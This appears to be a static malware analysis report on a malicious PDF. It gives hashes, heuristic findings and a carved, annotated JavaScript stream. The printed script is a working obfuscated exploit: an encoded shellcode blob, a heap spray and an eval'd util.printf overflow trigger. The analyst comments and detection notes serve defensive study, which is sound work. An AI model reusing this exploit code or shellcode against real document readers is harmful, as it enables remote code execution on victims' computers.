Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ddf0cd1ed76d563…

MALICIOUS

PDF

5.1 KB First seen: 2026-05-11
MD5: ab04586bbf696314dc9fb625cbb3eeb7 SHA-1: 1a712ca2afd32032f43215c662550fb9a9e58ad5 SHA-256: 2ddf0cd1ed76d5632993b4670269846d721fef5085cceb74d863f3307d16fd6d
66 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 3

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0003_000.js pdf-javascript-stream PDF /JS object 3 at offset 0x99 4162 bytes
SHA-256: 59e43d7f70ecf389519e2e9bb44afdd1182e096a9a9bf7cfaa4f031d20d7d9ff
Detection
ClamAV: No threats found (a signature-based result; it does not rule out the obfuscation findings below)
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'EDHypJOiDLwZSUAhV') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
/*
 * Analyst annotation for the carved PDF /JS stream (code below is unchanged).
 *
 * Read top to bottom, the script does the following:
 *   1. KNGEFgxgwOjEs(u) returns eval(u) and owkEwwZ(u) returns unescape(u).
 *      Every later eval/unescape goes through these wrappers, presumably to
 *      keep the built-in names away from the call sites.
 *   2. xxJPCbOVWBPSuUrxp is a long run of %uXXXX escapes decoded by the
 *      unescape wrapper into a string of 16-bit code units. It is presumably
 *      the source of the "pdf-js-unescape-shellcode" artifact listed in the
 *      report -- confirm by comparing the decoded bytes against that hash.
 *   3. jwKiNYMATQtquZbZ is built by appending one decoded 8-unit block
 *      32 times; uFgfJdQxABDorHK is a second decoded 8-unit block used as the
 *      seed for a filler string.
 *   4. WayriLBB = 20 + the lengths of the two strings from steps 2 and 3.
 *      The filler seed is doubled until it is at least that long, split with
 *      substring(), and then grown in a loop until its length plus WayriLBB
 *      reaches 0x60000.
 *   5. gjAsgpeZOrWx receives 1400 entries, each the concatenation
 *      filler + repeated block + decoded payload string. Allocating many
 *      large, identical strings that end in the payload is consistent with a
 *      heap-spray layout.
 *   6. The fragments "ut" + "il." + "pr" + "intf" and the pieces of
 *      aXrxeETZeBcP are concatenated into the text of a util.printf call
 *      whose floating-point format specifier asks for a width of 40002 and a
 *      precision of 40012, and that text is handed to the eval wrapper.
 *      NOTE(review): this looks like the trigger for a reader-side
 *      util.printf formatting overflow; match it to the vendor advisory before
 *      attributing it to a specific vulnerability.
 *
 * Detection notes: the API name and the format string never appear as single
 * literals, so matching has to be done on the concatenated/normalised value,
 * not on raw substrings. Long %u runs passed to unescape, loop bounds such as
 * 0x60000 and 1400 around string concatenation, and eval of an assembled
 * string are the static indicators visible here.
 *
 * NOTE(review): the preview appears to wrap the listing in the middle of the
 * first string literal, so the text is not valid JavaScript as displayed; use
 * the carved artifact identified by the SHA-256 above for byte-exact work.
 */
function KNGEFgxgwOjEs(u) {return eval(u);}function owkEwwZ(u) {return unescape(u);}var jwKiNYMATQtquZbZ ="";var xxJPCbOVWBPSuUrxp = owkEwwZ("%u4a27%ufd4e%ufc2f%u4046%u999b%ufcf5%u9837%u914f%u3f42%u46fd%u9146%u9f96%u9991%u98f8%u4099%u4342%u9f90%u9f2f%u3748%u914e%u9290%u4e4f%ufc4e%u90d6%u4a47%u9b46%u97f8%u4b37%u46f5%u4e2f%u9343%ufd42%u4b42%u4797%ufc96%u9099%u4998%u9b91%u9743%u989b%u484e%u4741%u994a%u2f37%u4b47%u4e40%u9099%u9293%u37fc%u464f%ufd99%u97f9%u93f9%u4af8%ud697%u4042%ufdd6%u273f%ud643%u4048%u439b%u2ff9%u3747%u43d6%u2f46%u982f%u9bd6%u4947%u374b%u49f8%u9349%u4648%u4137%u2737%uf937%u4891%u41fd%u9341%ufd97%u409b%u9943%u49d6%u2ff8%u9846%u9127%u9ff5%uf946%uf990%u9827%u4093%u9893%u4143%u90f9%u969f%u924b%u4b93%u974f%u2741%u42f5%u91fc%u41fc%u279f%u4afd%u99f8%u4848%uf99b%u9298%u3f46%u2f37%uf927%ud698%u9b97%u994f%u412f%u4797%u4690%ufd91%u4ff5%u902f%u4a99%ud648%u9249%u2f40%u9696%u964e%u9227%u4f40%u47fd%uf89b%u4041%u974b%u493f%u9b90%u9f41%u4348%ud64a%u9699%u27f5%u90d6%u91f9%u484b%u3fd6%u4bd6%u494b%u4398%u989f%u419f%u9ff5%uf846%u9296%u4e93%u43d6%uf8fd%u9792%u2f96%u3f97%u484a%ufd90%u4941%u9143%u4a49%u9199%u48fc%ufcf8%ud640%u4f92%u49f5%u4b46%u9692%u3ffc%u989b%u934b%u3749%u9343%uf54b%u419b%u9740%u4099%u462f%u4049%u9042%u9893%uf84b%u2f92%u9990%uf890%u272f%ud64e%u4198%u4a9f%u274f%u9647%u4b46%ufc96%ufc9b%ufd46%uf842%u4e4e%u484e%u4848%u9849%u3f93%u9190%u9799%uf899%u4a92%u4641%u4190%u4b47%u3f93%u4692%u4bf8%u9bf8%u90f9%u4348%u464a%u4296%ufc4e%u4241%ufc92%u9b97%ufc47%ufc27%u4b93%ufd4b%u989b%u40f5%uf896%u2f48%u4741%uf89b%u4b90%u37d6%u4027%u474a%u9f27%u4f91%u469f%u9340%u4649%u4b48%u499b%u9891%u984a%u9247%u9bfd%u4b98%u9827%u274f%u4b41%u4e4a%u49f8%ud6fc%ufc9f%u4a4f%u934b%u999b%u4299%u47f9%u2799%u972f%u4bf5%uf59b%u4740%u4f92%u48fc%u40fd%u9997%u9747%u4b4e%ufdfc%u4b93%u989f%u91fd%u2f40%u979b%u9098%u9192%u4242%ufd4b%u4249%u4146%u4a48%u4e47%u929b%u9937%u9937%u424a%u9848%u49fc%u4b4a%u4696%u4af9%u4897%uf996%ufd9b%u9192%u4f4a%u4293%u4792%u4843%ud64b%u4999%u9ff8%u984b%u4a92%u4043%ufcf5%u272f%u47
42%u3798%u414e%u9241%ufd4e%u9b4a%u2f40%u9b96%u4e4f%u9740%u973f%u479f%u933f%u4bd6%u3f2f%u2748%u494b%u469f%u4a92%ufc48%u904e%u9349%u4b4f%uf8f9%uf94e%u962f%u922f%u9837%u4696%u2743%ufd9b%u4397%uf53f%u99f9%u429f%u49d6%u979b%u47f8%u429f%u9093%u4b4f%uf940%uf92f%u9f4e%uf546%u4943%ufd27%u3793%u9b4b%u9bd6%u279f%u4f9f%u374b%u9646%u4698%uf89f%u40f8%u9346%u9327%u9643%u9741%u903f%u2f92%u9098%u9146%u4b93%u9b9b%u9b4b%u4391%u3792%u4290%u4e9f%ud64b%u984f%u484a%u964f%u4f37%u9f92%u924b%u46f9%ud697%u4f37%u422f%u402f%u9049%ubb47%u82cc%u09ac%uc933%u35b1%ucbd9%u74d9%uf424%u315a%u0e5a%uea83%u03fc%u8896%ufc4e%ue5da%u43d5%u9c68%u3e01%u606c%u29d2%u9ef4%ua758%u75ec%ub85d%ue1ec%u6023%u820e%ub033%u65ce%u59c4%u65ce%u99c4%udd91%u99d2%u1e2d%u61da%u1f47%u6e8c%u3bc3%ufb3c%ubceb%udf68%u8ee3%u7ef2%u6d9f%ue0f5%u1ed4%uc8d1%u9b61%u8225%u2121%u952e%ua223%u8184%uef38%uab38%u21d5%u48f9%u0b04%uba72%u8add%uf26a%u201e%u154a%u3e94%u1a6a%u4059%u4eab%u7995%ub54f%u0b71%u3e4d%ud723%uaa90%u9cb5%u679f%uf9b2%u7683%u762f%uf3bf%u61ae%u4749%u5994%u24c3%ubdf0%u77b2%ud998%u6dbf%u2268%u8dc0%u6803%u06cc%u797a%u4d47%ub07c%u578c%uc696%u2311%u0f14%u2b3c%u7e81%u7a3f%u2df1%u1c83%u2f8d%ufed0%uffac%ufe25%ue2e9%u3bc6%uc689%ub702%u172b%ud5c0%uc0be%u855f%ucb64%uf53e");var uFgfJdQxABDorHK = owkEwwZ("%u49f9%u9197%u49fc%u3790%u4a3f%u9848%u4199%u9747");for (kDnLAqUUdXy=0;kDnLAqUUdXy<32;kDnLAqUUdXy++)  jwKiNYMATQtquZbZ += owkEwwZ("%u914e%u4f2f%u9bf5%u90f5%u4849%u474e%uf8f9%u4e92");WayriLBB = 20 + jwKiNYMATQtquZbZ.length + xxJPCbOVWBPSuUrxp.length;while (uFgfJdQxABDorHK.length<WayriLBB) uFgfJdQxABDorHK+=uFgfJdQxABDorHK;NOnSixZWzFRWfLJ = uFgfJdQxABDorHK.substring(0, WayriLBB);vYXFodDBXDx = uFgfJdQxABDorHK.substring(0, uFgfJdQxABDorHK.length-WayriLBB);while(vYXFodDBXDx.length+WayriLBB < 0x60000) vYXFodDBXDx = vYXFodDBXDx+vYXFodDBXDx+NOnSixZWzFRWfLJ;gjAsgpeZOrWx = new Array();for (kDnLAqUUdXy=0;kDnLAqUUdXy<1400;kDnLAqUUdXy++) gjAsgpeZOrWx[kDnLAqUUdXy] = vYXFodDBXDx + jwKiNYMATQtquZbZ + xxJPCbOVWBPSuUrxp;EDHypJOiDLwZSUAhV="ut" + "il." 
+ "pr" + "intf" ;aXrxeETZeBcP='("' + '%' + '40' + '002' + '.400' + '12' + 'f"';ApViDJhrtIYtOjjkk = EDHypJOiDLwZSUAhV+aXrxeETZeBcP+",3.14);";KNGEFgxgwOjEs(ApViDJhrtIYtOjjkk);
javascript_obj0003_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 3 at offset 0x99 1024 bytes
SHA-256: 09ccbd6e99be49e6c1abfa83eab844379ff62e8f4b68e8358c98a2182c7ac20c